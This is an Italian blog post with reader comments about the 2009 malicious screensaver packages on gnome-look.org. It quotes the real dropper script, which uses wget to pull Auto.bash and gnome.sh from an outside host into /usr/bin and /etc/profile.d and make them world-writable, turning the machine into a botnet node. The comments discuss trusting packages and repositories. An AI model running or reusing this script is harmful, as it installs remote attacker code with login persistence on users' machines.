In questi giorni tutti parlano dei famosi virus su gnu/linux hostati su gnome-look.org camuffati in un .deb di uno screensaver…
C’è già chi parla di vulnerabilità di gnu/linux, la sua non più sicurezza impenetrabile e cazzatelle varie, ora grazie alla segnalazione di Airport vi mostrerò uno degli script incriminati:
#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
Super n00b o cosa?
Regards, Gusions.
Script preso da qua
Niente di nuovo, non esiste sistema operativo che possa proteggersi dalla stupidità/incautela degli utenti…
Senza parole…
Ciao a tutti,
scusate io non sono espertissimo di shell linux, potreste dirmi cosa fa questo comando?
Io non lo capisco … sigh
Grassssie
Sisi il vairus, adesso quanto ci goderanno i mIdia con questa cosa: peccato che per esempio, su Red Hat, Arch, Fedora, Gentoo… aehm… la cosa non funziona
Poi ovviamente, l’incautela regna sovrana. Deb esterni possono danneggiare il sistema! Statt’ accuort’!
n00b lo script, ma non è quello il tutto.
Ci sono Auto.bash e gnome.sh che a quanto letto rendono il pc parte di una bootnet…
In definitiva faceva un ping a un sito, niente di piu’, se pero’ lo stesso script e’ presente su un gran numero di macchine si potrebbe tradurre in un DDos a quel povero sito. Certo pero’ che mi pare una cosa abbastanza primitiva.
Certo che se uno si installa qualunque cosa senza neppure dare uno sguardo al codice…
ibart@quad-linux:~$ wget http://05748.t35.com/Bots/Auto.bash
–2009-12-10 21:03:47– http://05748.t35.com/Bots/Auto.bash
Risoluzione di 05748.t35.com… 69.10.48.106, 66.45.237.212
Connessione a 05748.t35.com|69.10.48.106|:80… connesso.
HTTP richiesta inviata, in attesa di risposta… 403 Forbidden
2009-12-10 21:03:48 ERRORE 403: Forbidden.
io sarei stato più interessato a quel contenuto
@ibart: niente di che, il vero lavoro lo faceva run.bash credo. Comunque il contenuto di Auto.bash se ti interessa lo trovi qui: http://ubuntuforums.org/showpost.php?s=decf1ad29c552d560e4e74bd7663873b&p=8463766&postcount=5
problema che riguarda solo quelli che non controllano mai la fonte da dove scaricano e che COSA stanno installando, io personalente se un software non ha repo o non è nei repo ufficiale ci penso due volte prima di installare.
Non fate sempre i fighi…voglio vedere quanta gente legge i codici primi di installare…mica tutti capiscono i sorgenti di un qualsiasi linguaggio. Smettetela di far vedere che sapete sempre tutto!
@ OpenCode: non si tratta di fare “i fighi”, si tratta di sapere cosa si sta’ facendo. E se non lo si sa’, semplicemente non farlo a meno che non sia certo della provenienza (e per certo intendo certo, non forse).
Un esempio: mettere un tema su Ubuntu spostando il file tar.gz sulla finestra dell’aspetto non ha conseguenze. Installare il tema eseguendo il file install.sh contenuto nell’archivio e’ pericoloso se non si sa cosa esattamente contiene l’eseguibile. Allora o leggi il contenuto del file install.sh (e sai cosa fa’), oppure non lo esegui. Semplice no?
Quando compri dei frutti di mare, prendi a caso o controlli prima che siano freschi? E consigliare a qualcuno di accertarsi che siano freschi prima di comprarli e mangiarli e’ fare i fighi per te? E se replichi che non tutti capiscono se e’ fresco o no, io ti rispondo, allora comprali solo da persone di cui ti fidi.
Ti sembra che gnome-look non sia un sito affidabile? Uno di qualcuno deve pur fidarsi a questo mondo..se devo pure preoccuparmi degli screensaver allora mi installo gentoo o arch o slax che bloccano i download automatici.ma soccome non tutti possono installare una distro del genere allora installano ubuntu che ti concede pure la penetrazione anale di default…
Hai ragione tu nel dire che il problema è l’utente ma alle volte bisogna capire che l’utente vuole solo installare un cazzarola di sfondo e basta!!!!
> “Ti sembra che gnome-look non sia un sito affidabile?”
Secondo me no, non e’ affidabile, a meno che non stiamo parlando di materiale presente da tempo e gia’ controllato (ma anche in quel caso io non eseguirei nulla). Prova a darti uno sguardo alle note legali e al FAQ. Gnome-Look e gli altri siti collegati di OpenDesktop.org non fanno altro che permettere a chi si iscrive di mettere a disposizione di tutti i propri lavori. Sta’ poi agli utenti controllare e segnalare il materiale non idoneo. Tanto e’ vero che appena e’ stato segnalato, quello screensaver e’ stato rimosso, cosi’ pure l’utente che l’aveva caricato.
Poi ovvio che uno sfondo essendo un’immagine la puoi scaricare tranquillamente, pero’ un eseguibile preso da siti dove chiunque puo’ uppare non lo eseguirei mai ne’ da utente normale, ne’ tanto meno da root.
Il tuo discorso purtroppo non è generale e quindi secondo me non va bene. Io potrei benissimo nascondere un codice malevolo in openoffice e per vie trasverse caricarlo su un sito diciamo “autorevole”…tu ti immagini uno che si spulcia tutto il codice di openoffice prima di installarlo? Mica parliamo di 4 righe di codice bash!! Prendere il codice qui sopra in esame è facile perchè è bash e sono 10 righe…Spero di essermi spiegato bene…come sempre senza rancore…:-)
Capisco cosa intendi, ma prima forse sarebbe il caso di metterci d’accordo su cosa intendiamo per sito autorevole. Io per fonte autorevole e sicura al 100% di pacchetti intendo i repository ufficiali di Debian. Per fonte sicura intendo i repository non ufficiali ma firmati come Marillat, e ben pochi altri. Tutto il resto per me non e’ autorevole ne’ sicuro, a meno che non sia il sito ufficiale di un’applicazione di cui mi fidi (firmata ecc.). Ad esempio OpenOffice non me lo andro’ di certo a scaricare da un sito qualunque, e sul sito di OpenOffice non puo’ andare la gente a caricare un file malevolo.
Figurati che c’e’ chi ritiene autorevole i siti di crack. Non sara’ il tuo caso, ma bisogna intendersi prima sul valore che diamo alla parola autorevole.
Guarda, oggi per essere autorevole basta avere un blog o un sito molto visitato….immagini se qualcuno con un sito come quello di pollycoke si fosse messo a fare uno scherzo del genere…sai quanti ci sarebbero cascati come polli?
@ OpenSource: ma sai che in realta’ e’ successa una cosa del genere qualche tempo fa? Un tipo che ha un blog molto frequentato ha messo tra i suoi repository un pacchetto che metteva un teschio nel desktop di chi lo installava. Uno scherzo molto significativo. Quelli non sono siti autorevoli, sono al limite siti di persone di cui ci fidiamo, ma c’e’ una bella differenza.